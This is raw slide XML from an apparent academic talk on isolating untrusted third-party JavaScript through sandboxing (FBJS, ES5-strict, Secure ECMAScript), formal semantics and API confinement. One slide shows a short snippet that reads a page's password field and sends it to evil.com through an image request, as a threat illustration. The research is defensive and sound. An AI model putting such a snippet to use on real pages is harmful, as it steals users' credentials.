              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/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501650"/>
          </a:xfrm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60403989-3EFF-4C4D-9A9D-F370A7D41F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4107180"/>
            <a:ext cx="8839200" cy="845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Theorem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376092"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[ESORICS’09]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> For all terms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t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ∈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safe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(B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,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rew(t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when executed on heap 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H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Calibri"/>
              </a:rPr>
              <a:t>does not access any identifier or property name from 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B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" baseline="-250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algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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533400" y="1219200"/>
            <a:ext cx="8001000" cy="1409700"/>
            <a:chOff x="304800" y="2781300"/>
            <a:chExt cx="8001000" cy="1409700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4419605" y="2781300"/>
              <a:ext cx="1498595" cy="1409700"/>
              <a:chOff x="4419600" y="5181600"/>
              <a:chExt cx="1284509" cy="1104900"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="Manual Operation 32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="4438650" y="5162550"/>
                <a:ext cx="1104900" cy="1143000"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartManualOperati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84910" y="5401272"/>
                <a:ext cx="1219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Filter &amp; Rewriter</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400" dirty="0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 rot="10800000">
              <a:off x="5871497" y="3294887"/>
              <a:ext cx="910303" cy="36271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0400" y="3241357"/>
              <a:ext cx="1295400" cy="49244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30" name="Right Arrow 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3276600" y="3276600"/>
              <a:ext cx="910303" cy="36271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800" y="2781300"/>
              <a:ext cx="2895599" cy="14097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rew(s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)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does not access any identifiers or properties named in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Time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3745468"/>
              <a:ext cx="129540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Third-party</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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347472" y="5029201"/>
            <a:ext cx="90678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3464" marR="0" lvl="0" indent="-283464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Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" marR="0" lvl="0" indent="-283464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 for isolating the global scope object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[ESORICS’09]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" marR="0" lvl="0" indent="-283464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Semantics-preserving renaming technique for identifiers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[CSF’09]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0403989-3EFF-4C4D-9A9D-F370A7D41F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091624"/>
            <a:ext cx="7620000" cy="5847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"/>
              </a:rPr>
              <a:t>&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>“https://adpublisher.com/ad1.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>“https:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>//adpublisher.com/ad2.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier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457200" y="1752600"/>
            <a:ext cx="8077200" cy="4451350"/>
            <a:chOff x="762000" y="1219200"/>
            <a:chExt cx="7669530" cy="4908550"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15" descr="a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1219200"/>
              <a:ext cx="7669530" cy="4908550"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 19" descr="Screen shot 2011-05-30 at 5.00.52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00" y="1676400"/>
              <a:ext cx="2438400" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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6324600" y="2514600"/>
              <a:ext cx="1371600" cy="36131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8" name="Picture 7" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315477" y="3581400"/>
            <a:ext cx="14445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762000" y="1752600"/>
            <a:ext cx="5477278" cy="445135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487941" y="2030082"/>
            <a:ext cx="5608059" cy="865518"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 53226"/>
              <a:gd name="adj2" fmla="val 1079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  <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Read password using the DOM API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2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ourier"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> = document.getElementsByName(“password”)[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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42482" y="5105400"/>
            <a:ext cx="5653518" cy="865518"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54584"/>
              <a:gd name="adj2" fmla="val -1003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Send it to evil location </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(not subject to same-origin policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D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1F497D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1F497D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>=``</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>http::www.evil.com/info.jpg?_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>_”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3539098"/>
            <a:ext cx="5638801" cy="1032902"/>
            <a:chOff x="457200" y="2743200"/>
            <a:chExt cx="5638801" cy="1032902"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rounded Rectangle 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="478154" y="2743200"/>
              <a:ext cx="5617847" cy="103290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200" y="2773448"/>
              <a:ext cx="5629677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Untrusted third-party JavaScript poses a threat to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>critical hosting page resources</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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38975" y="3352800"/>
            <a:ext cx="5609425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Document Object Model (DOM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: programmatic interface for manipulating features of the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1F497D"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/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Third-party JavaScript: Security Threat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9" grpId="1" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="1" animBg="1"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="4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Page Isolation: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Operational Semantics for JavaScript (ES3)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Sandboxing technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comparison with FBJS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FBJS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laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1447800"/>
            <a:ext cx="4724400" cy="3581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914400" y="1562099"/>
            <a:ext cx="3038764" cy="2134969"/>
            <a:chOff x="990600" y="1981200"/>
            <a:chExt cx="2895600" cy="2019300"/>
          </a:xfrm>
        </p:grpSpPr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990600" y="1981200"/>
            <a:ext cx="2895600" cy="2010365"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <p:oleObj spid="_x0000_s951298" name="Acrobat Document" r:id="rId4" imgW="2667000" imgH="2133600" progId="">
                <p:embed/>
              </p:oleObj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990600" y="1981200"/>
              <a:ext cx="2895600" cy="2019300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924800" y="3267670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Third-party application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server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248400" y="3697069"/>
            <a:ext cx="1545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452012" y="1143000"/>
            <a:ext cx="1655676" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2079"/>
              <a:gd name="adj2" fmla="val 861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Rewrite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FBJS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Down Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4638964" y="2667001"/>
            <a:ext cx="304800" cy="167639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25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2012" y="18288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90600" y="2362199"/>
            <a:ext cx="1600200" cy="720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55288" y="2133600"/>
            <a:ext cx="157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FBJS app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88288" y="2176046"/>
            <a:ext cx="157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Rewritten app </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Down Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7226084" y="2083573"/>
            <a:ext cx="330633" cy="10667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3955772" y="1149629"/>
            <a:ext cx="394256" cy="297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28600" y="5334000"/>
            <a:ext cx="8619836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FBJS is a sublanguage of JavaScript designed for writing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29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263" y="1749112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FBJS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39" b="1" dirty="0" smtClean="0"/>
              <a:t>FBJS sandboxing mechanism </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>(for Hosting Page Isolation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Blacklists critical identifiers and property names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Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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IDX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like check on dynamically generated properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/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Disallows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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>,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eval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8839200" cy="306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sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Our technique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: inspired by FBJS , But:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="114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Systematically designed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pP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IDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> check is semantics preserving, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overall more expressive than FBJS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"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backed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rigorous proof of correctness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="114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Impact on FBJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: found 4 different exploitable vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>built “malicious apps” that could reach the DOM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>reported them along with fixes that were adopted promptly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="114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Limitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> our guarantees hold </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> for JavaScript (ES3) as standardized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990600"/>
            <a:ext cx="9144000" cy="53657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8328" y="3200400"/>
            <a:ext cx="846085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Take Away</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Formal semantics are immensely useful in both designing and analyzing sandboxing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2286000"/>
            <a:ext cx="6858000" cy="18288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Mediated Access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Mediated Access: Problems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6" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="19050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05256" y="20299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5256" y="3429000"/>
            <a:ext cx="2784373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Resources to protect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(entire DOM)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2926080"/>
            <a:ext cx="210113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API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1" y="2209800"/>
            <a:ext cx="2133600" cy="6858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Sandboxed code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(only access the API)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1752600"/>
            <a:ext cx="4343399" cy="1676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obtains access to ANY protected resource ONLY via the API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8200" y="3861776"/>
            <a:ext cx="4343400" cy="16246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API Confinement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: verify that sandboxed code cannot use the API to obtain direct access to a security-critical resource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Mediated Access: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686800" cy="4724399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ES5-strict and Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (SES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandboxing technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Confinement analysis technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application: Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe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Enforcing mediated access is challenging for ES3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915400" cy="472439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No lexical scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Ambient access to global scope object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Lack of closure-based encapsulation (in implementations) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Mutable built-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Dynamic Code Generation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700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6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3834825"/>
            <a:ext cx="8686800" cy="1588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865602"/>
            <a:ext cx="8991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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Designing and analyzing mediating APIs is a nightmare!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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ES5-strict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7243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ES5-strict = ES3 with the following restrictions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1981200"/>
          <a:ext cx="75438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5878"/>
                <a:gridCol w="3117922"/>
              </a:tblGrid>
              <a:tr h="4868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Restriction (relative to ES3)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Rationale</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="47321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sz="15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"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>delete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 on variable names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24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321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prototypes for scope objects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23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with</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1500" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="376092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23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this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coercion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9523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Safe built-in functions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321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.caller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</a:rPr>
                        <a:t>, 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.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" dirty="0" err="1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callee</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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on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arguments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object</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1500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32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.caller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</a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="376092"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>.arguments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on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function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 objects</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean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  <a:p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321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arguments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 and formal parameters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 aliasing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2971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Lexical scoping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0680" y="3886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No ambient access to Global object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5117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Closure-based encapsulation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sub-language Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (SES)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SES = ES5-strict with two more restrictions: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800" dirty="0" smtClean="0"/>
              <a:t>Immutable built-in objects (e.g., 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Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)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800" dirty="0" smtClean="0"/>
              <a:t>Only scope-bounded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="376092"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>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415605"/>
            <a:ext cx="891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libri"/>
              </a:rPr>
              <a:t>Remarks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Practical to implement within ES5-strict</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Under proposal by the ECMA committee (TC39) for adoption within future versions of JavaScript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Scope-bounded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval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152400" y="2801035"/>
            <a:ext cx="8382000" cy="856565"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -12725"/>
              <a:gd name="adj2" fmla="val -161663"/>
